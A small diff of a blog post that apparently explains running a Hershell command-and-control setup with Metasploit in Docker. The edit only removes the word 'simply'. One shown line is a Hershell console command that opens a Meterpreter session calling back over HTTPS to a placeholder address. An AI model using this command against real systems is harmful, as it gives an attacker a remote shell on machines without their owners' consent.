khast3x/khast3x.github.io/_posts/2018-10-02-docker-c2-hershell-metasploit.md

 ```

-In your hershell console, simply type:
+In your hershell console, type:

 ```bash
 [hershell]> meterpreter https YOUR-DOCKER-IP:8443